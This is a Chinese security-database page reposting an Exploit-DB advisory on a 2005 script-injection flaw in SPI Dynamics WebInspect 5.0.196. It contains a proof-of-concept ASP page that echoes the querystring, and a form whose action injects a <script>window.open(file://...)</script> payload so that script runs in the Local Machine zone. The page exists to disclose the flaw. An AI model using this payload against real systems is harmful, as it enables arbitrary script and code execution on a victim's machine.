SPI Dynamics WebInspect 5.0.196 – Cross Application Script Injection

SPI Dynamics WebInspect 5.0.196 – Cross Application Script Injection

漏洞ID 1055288 漏洞类型
发布时间 2005-07-26 更新时间 2005-07-26
图片[1]-SPI Dynamics WebInspect 5.0.196 – Cross Application Script Injection-安全小百科CVE编号 N/A
图片[2]-SPI Dynamics WebInspect 5.0.196 – Cross Application Script Injection-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26032
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14385/info

WebInspect is vulnerable to a cross-application script injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied data prior to including it in content rendered in an Internet Explorer COM object.

This vulnerability allows attackers to execute arbitrary script code in the context of the vulnerable application. By exploiting the knowledge of predictable files on the targeted system, attackers may also cause arbitrary script code to be executed in the "Local Machine" zone, facilitating remote machine code installation and execution. 

<HTML><HEAD><BODY>
<%
if request.querystring<>"" then
response.write request.querystring
end if
%>
<form action="script>/<script>window.open(%27file://C:\Program
Files\SPIDynamics\WebInspect\Working\vulnerability.htm%27)</script>" method=get> Please login:<br>
<input type=submit value="Login"><br> <input type=hidden name='hidden' value="Login"><br> </form>
</BODY></HTML>

相关推荐: QNX多个程序不安全默认权限漏洞

QNX多个程序不安全默认权限漏洞 漏洞ID 1203611 漏洞类型 权限许可和访问控制 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2407 CNNVD-ID CNNVD-200212-345 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享